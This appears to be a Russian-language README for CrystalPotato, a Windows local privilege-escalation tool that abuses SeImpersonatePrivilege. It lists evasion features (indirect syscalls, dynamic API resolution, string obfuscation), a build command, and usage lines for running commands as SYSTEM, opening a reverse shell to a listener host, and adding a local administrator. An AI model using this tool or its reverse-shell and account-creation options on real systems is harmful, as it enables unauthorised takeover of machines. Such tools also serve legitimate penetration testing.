
Порт GodPotato на Crystal для злоупотребления SeImpersonatePrivilege с помощью косвенных системных вызовов, динамического разрешения API и обфускации строк на этапе компиляции. Запускайте команды, reverse shell или добавляйте пользователей.
Crystal-порт GodPotato — локальное повышение привилегий с учётных записей, имеющих SeImpersonatePrivilege, до SYSTEM. Работает за счёт злоупотребления DCOM OXID Resolver и олицетворения через именованные каналы.
Windows API разрешаются динамически и вызываются через косвенные заглушки системных вызовов (indirect syscall stubs), все строки XOR-обфусцированы на этапе компиляции, и по умолчанию выводится только результат выполнения команды. Протестировано на Windows 10, 11 и Server 2025.
CrystalPotato компилируется в один файл без зависимостей с использованием Crystal on Windows:
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static
Выполните команду, запустите обратную оболочку или создайте локального администратора.
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

GodPotato — оригинальная реализация на C# от BeichenDream.
RustPotato — реализация на Rust от safedv.
SigmaPotato — реализация на C# с дополнительными функциями от tylerdotrar.
| Флаг | Описание |
|---|
-c CMD | Команда для выполнения от имени SYSTEM или оболочка для обратной оболочки (по умолчанию: cmd.exe) |
-H HOST | Хост прослушивателя обратной оболочки |
-P PORT | Порт прослушивателя обратной оболочки |
-u USER | Создать локального администратора — имя пользователя |
-pw PASS | Создать локального администратора — пароль |
-p NAME | Пользовательское имя канала (по умолчанию: Crystal) |
-d | Отладочный вывод |
-dd | Полная трассировка |
-h | Показать справку |